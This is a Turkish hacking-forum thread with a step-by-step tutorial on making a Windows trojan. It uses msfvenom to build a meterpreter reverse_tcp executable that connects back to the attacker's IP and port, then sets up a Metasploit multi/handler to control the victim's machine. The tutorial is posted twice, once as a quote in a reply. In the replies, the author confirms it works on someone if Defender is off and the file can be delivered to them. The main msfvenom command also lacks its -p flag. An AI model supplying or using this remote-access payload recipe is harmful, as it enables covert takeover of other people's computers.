Msfvenom ile Trojan Nasıl Yapılır ? | Kali Linux

kst132

Basın&Medya Ekibi Asistanı
12 Haz 2023
985
624
giphy.gif

Msfvenom ile Trojan Yapımı

Merhaba arkadaşlar bu gün Trojan nedir nasıl yapılır,metasploit nedir gibi konulardan bahsedeceğim lafı fazla uzatmadan konuya geçelim;
Metasploit Nedir ?
-Metasploit sistemleri exploit etmek için geliştirilmiş bir araçtır.

Peki Nedir Bu Exploit ?
-
Exploit sistemde yer alan açıklardan faydalanılarak geliştirilmiş kodlardır ve böylece sistemi devre dışı bırakabilir.


Msfvenom Nedir ?
-
Msfvenom verdiğimiz parametrelerle metasploit aracılığıyla payloads oluşturabilen bir sistemdir.
Şimdi linux'u açalım ve root kullanıcısını açalım;
msfvenom
yazıp çalıştıralım
ogjgv48.PNG

Gördüğünüz gibi burada parametreler var. Peki bunlar ne işe yarıyor;
En başta gördüğünüz -l den örnek vereceğim. Mesela biz msfvenom -l encrypt kodunu yazdığımız zaman bize msfvenom'un encrypt türlerini listeliyor. Yani -l Listeleme yöntemidir.
Şimdi bir altına geçelim -p yani Payload
Payload Ne Demek ?
-Şimdi biz truva atımızı oluşturunca karşı ve bizim aramızdaki bağlantının nasıl gerçekleşeceğine payload diyoruz.

Şimdi payloadlarımızı listeleyelim bunun için;
msfvenom -l payloads
Kodunu giriyoruz
7bkatcg.PNG

Solda gördüğünüz şeyler bizim payloadslarımız.. Bu payloadsların bir tane söz dizini var. Şimdi bu söz dizinini size açıklayayım;
En başta gördüğünüz windows sistemi belirtiyor. x64 sistemin mimarisini belirtiyor. Bundan sonrakinde shell,meterpreter gibi bunlarda bizim konsolumuzu belirtiyor.
Ne Demek Konsol ?
Biz truva atını oluşturup karşıya gönderince bizim bu bağlantıyı yönetebileceğimiz bir panel gerekiyor. İşte bunlarda shell,meterpreter gibi
En sondaki bölümde bağlantının gerçekleşme türünü belirtiyor.
Normalde konu bu kadardı ancak size uygulamalı halini de göstereyim. Aklınızda hiç bir soru işareti kalsın istemiyorum.
Attack
Son kısıma geldik... Şimdi üst tarafta anlattığım her şey kullanacağız.Öncelikle yapacağımız işlemi anlatayım;
msfvenom diyoruz sonrada -p ile payload'ı belirtiyoruz. Ben windows'a atak gerçekleştireceğim için windows yazıyoruz. Şimdiki kısımda eğer x64 gibi mimarisini belirtmediğiniz zaman hata alabilirsiniz. Bu yüzden belirtmeniz önemli.
Meterpreter rewerse_tcp bu ne demek tcp protokolü üzerinden bana ters bağlantı aç ters bağlantıyı meterpreter'e bağla
LHOST yani Lokal Host demek yani bizim kendi bilgisayarımızın IP adresi peki bizim buna neden ihtiyacımız var ?
Çünkü arkadaşlar hani karşı bilgisayar bize bağlanıcak ya bağlanıcağı yeri bilmesi gerekiyor.
Bunu öğrenmek içinde terminal'e
İfconfig yazıyoruz
s95hlde.PNG

Şimdi LPORT= 5050 olsun
-f ile formatı belirtmemizi istiyor windows bir sistem olduğu için exe olucak. Ardından >payloadun ismi
Bu size anlattığım açıklama kısmıydı şimdi kodu girelim;

msfvenom windows/x64/meterpreter/reverse_tcp LHOST=IPadresiniz LPORT=5050 -f exe > payloadunismi.exe
304z39l.PNG


Not:En sona deneme1.exe koymayı unutmayın
Bu kadardı peki adam buna tıkladı e bana nerden gelicek
Bunu metasploit ile yapacağız arkadaşlar.
terminale

msfconsole
yazıyoruz. Ardından
use exploit/multi/handler
yazıyoruz ve
options
yazıyoruz.
d2e3r7r.PNG

Kullandığımız options komutu bizim multi/handler'a ne gibi parametreler verebileceğimizi söylüyor.
Şimdi

set payload windows/x64/meterpreter/reverse_tcp
yazıyoruz.
set lhost Ipadresiniz
Ardından
set lport 5050
Şuanda tüm işlemler bitti başlatmak için
run
demeniz yeterli
Not:Eğer defender açıksa yüksek ihtimalle yazılımımız yakalanacaktır.
Ancak defender yoksa ve karşı taraf bunu açarsa ne yapabiliriz
Karşı taraf dosyayı açınca terminalinizde belli olucaktır ardından help yazıp neler yapabileceğinizi görebilirsiniz.
Konumuz bu kadardı umarım faydlı olmuştur. Anlamadığınız yer olursa yardımcı olmaya çalışırım iyi forumlar.

4c9hm4j.png










 
Moderatör tarafında düzenlendi:

Butcherb3y

Uzman üye
1 Eyl 2022
1,618
1,201
Anıtkabir
giphy.gif

Msfvenom ile Trojan Yapımı

Merhaba arkadaşlar bu gün Trojan nedir nasıl yapılır,metasploit nedir gibi konulardan bahsedeceğim lafı fazla uzatmadan konuya geçelim;
Metasploit Nedir ?
-Metasploit sistemleri exploit etmek için geliştirilmiş bir araçtır.

Peki Nedir Bu Exploit ?
-
Exploit sistemde yer alan açıklardan faydalanılarak geliştirilmiş kodlardır ve böylece sistemi devre dışı bırakabilir.


Msfvenom Nedir ?
-
Msfvenom verdiğimiz parametrelerle metasploit aracılığıyla payloads oluşturabilen bir sistemdir.
Şimdi linux'u açalım ve root kullanıcısını açalım;
msfvenom
yazıp çalıştıralım
ogjgv48.PNG

Gördüğünüz gibi burada parametreler var. Peki bunlar ne işe yarıyor;
En başta gördüğünüz -l den örnek vereceğim. Mesela biz msfvenom -l encrypt kodunu yazdığımız zaman bize msfvenom'un encrypt türlerini listeliyor. Yani -l Listeleme yöntemidir.
Şimdi bir altına geçelim -p yani Payload
Payload Ne Demek ?
-Şimdi biz truva atımızı oluşturunca karşı ve bizim aramızdaki bağlantının nasıl gerçekleşeceğine payload diyoruz.

Şimdi payloadlarımızı listeleyelim bunun için;
msfvenom -l payloads
Kodunu giriyoruz
7bkatcg.PNG

Solda gördüğünüz şeyler bizim payloadslarımız.. Bu payloadsların bir tane söz dizini var. Şimdi bu söz dizinini size açıklayayım;
En başta gördüğünüz windows sistemi belirtiyor. x64 sistemin mimarisini belirtiyor. Bundan sonrakinde shell,meterpreter gibi bunlarda bizim konsolumuzu belirtiyor.
Ne Demek Konsol ?
Biz truva atını oluşturup karşıya gönderince bizim bu bağlantıyı yönetebileceğimiz bir panel gerekiyor. İşte bunlarda shell,meterpreter gibi
En sondaki bölümde bağlantının gerçekleşme türünü belirtiyor.
Normalde konu bu kadardı ancak size uygulamalı halini de göstereyim. Aklınızda hiç bir soru işareti kalsın istemiyorum.
Attack
Son kısıma geldik... Şimdi üst tarafta anlattığım her şey kullanacağız.Öncelikle yapacağımız işlemi anlatayım;
msfvenom diyoruz sonrada -p ile payload'ı belirtiyoruz. Ben windows'a atak gerçekleştireceğim için windows yazıyoruz. Şimdiki kısımda eğer x64 gibi mimarisini belirtmediğiniz zaman hata alabilirsiniz. Bu yüzden belirtmeniz önemli.
Meterpreter rewerse_tcp bu ne demek tcp protokolü üzerinden bana ters bağlantı aç ters bağlantıyı meterpreter'e bağla
LHOST yani Lokal Host demek yani bizim kendi bilgisayarımızın IP adresi peki bizim buna neden ihtiyacımız var ?
Çünkü arkadaşlar hani karşı bilgisayar bize bağlanıcak ya bağlanıcağı yeri bilmesi gerekiyor.
Bunu öğrenmek içinde terminal'e
İfconfig yazıyoruz
s95hlde.PNG

Şimdi LPORT= 5050 olsun
-f ile formatı belirtmemizi istiyor windows bir sistem olduğu için exe olucak. Ardından >payloadun ismi
Bu size anlattığım açıklama kısmıydı şimdi kodu girelim;

msfvenom windows/x64/meterpreter/reverse_tcp LHOST=IPadresiniz LPORT=5050 -f exe > payloadunismi.exe
304z39l.PNG


Not:En sona deneme1.exe koymayı unutmayın
Bu kadardı peki adam buna tıkladı e bana nerden gelicek
Bunu metasploit ile yapacağız arkadaşlar.
terminale

msfconsole
yazıyoruz. Ardından
use exploit/multi/handler
yazıyoruz ve
options
yazıyoruz.
d2e3r7r.PNG

Kullandığımız options komutu bizim multi/handler'a ne gibi parametreler verebileceğimizi söylüyor.
Şimdi

set payload windows/x64/meterpreter/reverse_tcp
yazıyoruz.
set lhost Ipadresiniz
Ardından
set lport 5050
Şuanda tüm işlemler bitti başlatmak için
run
demeniz yeterli
Not:Eğer defender açıksa yüksek ihtimalle yazılımımız yakalanacaktır.
Ancak defender yoksa ve karşı taraf bunu açarsa ne yapabiliriz
Karşı taraf dosyayı açınca terminalinizde belli olucaktır ardından help yazıp neler yapabileceğinizi görebilirsiniz.
Konumuz bu kadardı umarım faydlı olmuştur. Anlamadığınız yer olursa yardımcı olmaya çalışırım iyi forumlar.

4c9hm4j.png
Elinize sağlık
 

kst132

Basın&Medya Ekibi Asistanı
12 Haz 2023
985
624
ellerine , emeğine sağlık
Teşekkür ederim
Teşekkür ederim
Eline Sağlık Hocam...
Teşekkür ederim
Windows kullanan birine yedirsek işe yarar mı?
Eğer defender kapalı ise birde nasıl karşı tarafa yedireceğinizi bulabilirseniz işe yarar.
Elinize sağlık, bağlantının sürdürülebilir olması için LHOST ve LPORT kısmına önem vermek gerekir…
Kesinlikle katılıyorum
Teşekkür ederim
Bunlar biraz eskimedi mi..
Ben teker teker anlatayım da eski olsun en azından bir konusu geçtiğinde biliyor olursunuz.
Eline sağlık, daha iyi konular bekliyorum senden
Teşekkür ederim elimden gelenin en iyisini yapmaya çalışacağım.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.